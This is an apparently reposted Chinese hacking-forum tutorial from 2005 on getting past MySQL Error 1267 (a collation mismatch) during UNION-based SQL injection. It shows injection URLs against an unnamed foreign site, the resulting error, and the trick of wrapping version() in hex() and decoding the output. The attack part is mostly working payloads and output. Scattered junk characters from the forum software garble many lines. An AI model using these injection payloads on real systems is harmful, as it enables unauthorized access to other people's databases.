中国网络渗透测试联盟

标题: MySQL注射时ErrorNo.1267的突破 [打印本页]
作者: admin    时间: 2012-9-15 14:04
标题: MySQL注射时ErrorNo.1267的突破
本文作者:SuperHei. U, A3 i7 G, j# D3 D
文章性质:原创8 ~/ l2 n7 Y) L6 x
发布日期:2005-10-18# U; Z0 j# R3 V: J8 C7 Y# `
测试个国外的站时:
4 v4 ^3 j9 j; I5 |url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*# {3 S. i, |0 I6 Y% e
返回错误:: D! Q  p7 B7 d! ^
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
9 F6 m. j. [4 l" @1 ZMySQL Error No. 126; j' A" Z, \; T& P% q& h
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。; k( L1 o# Q% `* d& H" h: U( F
解决办法:转为其他编码如hex。; ~6 E) K3 h, }' u
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
7 D0 m- W' s  W% {  w2 a成功得到hex(version())的值为:2 g: \6 ^2 J/ P& J* G- u1 R- k$ L: M
342E312E332D626574619 g2 o2 [9 ]* p
回Mysql查询下得到:
, q' I2 d# V5 T, Tmysql> select 0x342E312E332D62657461;9 C. `- f! K+ T3 v: |7 b
+------------------------+& Z/ G* c9 y6 V. b5 \
| 0x342E312E332D62657461 |
* P, Q; E' Y) A1 U( Y+------------------------+1 y+ b5 S1 I  N7 [# U, _7 D6 Q
| 4.1.3-beta |
/ G9 m8 p, k7 c# w' x+------------------------+
) v' a: B" \. d& n; F( R5 o  W; v1 row in set (0.00 sec)
( W8 P' [8 O1 G4 T& K
6 B0 e0 E+ {+ G. S



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2